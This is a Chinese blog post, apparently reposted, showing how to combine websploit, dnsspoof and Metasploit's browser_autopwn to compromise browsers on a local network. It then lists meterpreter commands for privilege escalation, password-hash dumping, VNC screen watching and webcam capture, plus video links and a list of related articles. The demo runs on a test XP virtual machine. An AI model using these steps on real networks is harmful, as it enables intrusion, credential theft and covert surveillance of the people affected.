原理为 websploit调用dnsdpoof进行dns欺骗配合神器metasploit的web_autopwn模块进行渗透;特点:过程基本全自动。

终端输入websploit打开websploit;输入show modules查看所有模块:

查看到有exploit/browser_autopwn模块和exploit/java_applet模块可以使用(新版metasploit去掉了exploit/autopwn模块);这里以exploit/browser_autopwn模块为例:

设置好之后输入run开始运行,然后就等着鱼儿上钩了(这两个功能完全可以单独手动配置的,这里websploit将其组合了起来):

这是虚拟机里xp测试系统打开网页之后:

getsystem                                      #获取sytem权限

hashdump                                     #抓取账户密码hash值  ,然后用ophcrack破解

run vnc                                           #远程连接,监控屏幕

run webcam -p /var/www/          #监控摄像头

background                                   #不退出此meterpreter并返回msf

。。。

视频:

清晰版视频下载地址:http://pan.baidu.com/s/1o6AYkK6

http://v.youku.com/v_show/id_XNjUxMjM2OTQ0.html

转载于:https://www.cnblogs.com/h4ck0ne/p/5154685.html

使用websploit在局域网全自动渗透相关推荐

  1. Deep Exploit:结合机器学习的全自动渗透测试工具

    Deep Exploit是一款可与Metasploit链接使用,且结合机器学习的全自动渗透测试工具. Deep Exploit有两种模式: 智能模式(Intelligence mode) Deep E ...

  2. 政企机构用户注意 蠕虫病毒Prometei正在针对局域网横向渗透传播

    近日,火绒安全实验室监测到蠕虫病毒"Prometei"正在全网传播.该病毒通过横向渗透攻击方式对局域网中的终端进行大面积入侵,并且可以跨平台(Window.Linux.macOS等 ...

  3. Yuki Chan全自动渗透测试工具的安装及使用

    Yuki Chan是一个自动渗透测试工具,将为您审核所有标准安全评估.它是最好的渗透测试工具之一,它提供许多集成安全工具和执行许多渗透测试操作到目标网络. 已经有超过15个模块与Yuki chan集成 ...

  4. Kali Linux 安全渗透教程第三更1.2 安全渗透所需工具

    了解了渗透测试的概念后,接下来就要学习进行渗透测试所使用的各种工具.在做渗透测试之前,需要先了解渗透所需的工具.渗透测试所需的工具如表1-1所示: 表1-1  渗透所需工具 splint unhide ...

  5. 带你认识Linux安全渗透,秒懂的那种

    什么是安全渗透 渗透测试并没有一个标准的定义.国外一些安全组织达成共识的通用说法是,渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点.技术缺陷 ...

  6. Kali Linux 安全渗透教程lt;第三更gt;1.2 安全渗透所需工具

    了解了渗透測试的概念后,接下来就要学习进行渗透測试所使用的各种工具.在做渗透測试之前,须要先了解渗透所需的工具.渗透測试所需的工具如表1-1所看到的: 表1-1  渗透所需工具 splint unhi ...

  7. web安全攻防渗透测试笔记

    第三章sqlmap (1)      安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2)      在环境变量p ...

  8. 基于kali的一次无线渗透测试

    <中华人民共和国刑法> 第二百八十六条 违反国家规定,对计算机信息系统功能进行删除.修改.增加.干扰,造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役:后果特别严重的 ...

  9. web安全攻防渗透测试笔记 (信安一班 李静)

    第三章sqlmap (1)      安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2)      在环境变量p ...

最新文章

  1. Linux系统安装gcc/g++详细过程
  2. Postman 最被低估的功能!
  3. 第10章 序列的修改、散列和切片
  4. 基于MATLAB的LDPC编译码仿真,调制为64QAM
  5. 让前端与后端异步起来
  6. phoneGap技术分析
  7. Field+offset(len)
  8. c#利用反射+特性实现简单的实体映射数据库操作类(表与类的映射)
  9. ios是否安装了某应用
  10. Vue-常用加密(MD5,DES,SHA256,BASE64,SHA1,RSA)
  11. 7月编程排行榜新鲜出炉,再次上演神仙打架!
  12. 微信智慧支付日系统服务器崩溃,微信支付大面积出现故障 微信支付系统繁忙怎么解决 微信支付崩溃原因是什么...
  13. 程序 多核优化 linux,linux 多核CPU性能调优
  14. ANSYS - 表格加载方法
  15. for循环的几种写法
  16. Windows Ubuntu 子系统修改默认登陆用户·
  17. oracle 11g安装过程中问题:移动bin\oralbac11.dll 到bin\oralbac11.dll.dbl出错
  18. 《CSS禅意花园》明日上市
  19. npm安装electron时报Error: EPERM: operation not permitted, scandir.....
  20. Monte Carlo方法的基本思路

热门文章

  1. 透视WPF 应用程序的利器
  2. 安装IE8不能调试VS2005的解决办法
  3. IIS监控--自动重启脚本工具
  4. word公式和文字不在一行上,错位了如何解决
  5. php sapi linux,PHP内核 - SAPI - Cli
  6. 知识蒸馏原来不是你想的那样子
  7. 谁会为小扎的AI管家配音:网民选了这位老帅哥
  8. 探秘区块链 - 头条新闻
  9. django性能优化缓存view详解
  10. 【原创】用MySQL 生成随机密码-增加大写处理